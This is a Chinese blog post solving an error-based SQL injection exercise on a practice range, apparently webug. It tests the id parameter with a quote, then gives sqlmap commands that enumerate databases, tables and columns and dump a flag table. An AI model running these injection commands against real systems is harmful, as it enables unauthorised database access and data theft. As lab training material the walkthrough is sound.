01显错注入


打开靶场后的链接是

106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1

那么我们在?id=1 后面加一个' 也就是?id=1'

查看是否报错

这里显示错误,那么我们进行sql注入

这里利用sqlmap注入

sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" --dbs #查询数据库

一路输入Y即可,如下图,爆出数据库。

 

第一次扫描同一网站下需要时间,我这里第二次扫描发现直接把上一次扫描结果搬过来了。

然后我们爆出表

sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug --tables

 

爆出表结构和数据

sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug -T flag --columns

 

sqlmap -u "106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1" -D webug -T flag -C "id,flag" --dump

爆出来的数据是dfafdasfafdsadfa

然后去提交flag试试看

OK 搞定

 

版权声明 © 本文内容来自若白博客:R-Blog.cn 文章链接:https://r-blog.cn/202206252553.html 转载请注明出处 原创不易,觉得有用的话,请转发保留版权信息表示支持!
THE END
分享
二维码
打赏
海报
01显错注入
打开靶场后的链接是 106.52.182.45:49153/control/sqlinject/manifest_error.php?id=1 那么我们在?id=1 后面加一个' 也就是?id=1' 查看是否报错 这里显示错误……
<<上一篇
下一篇>>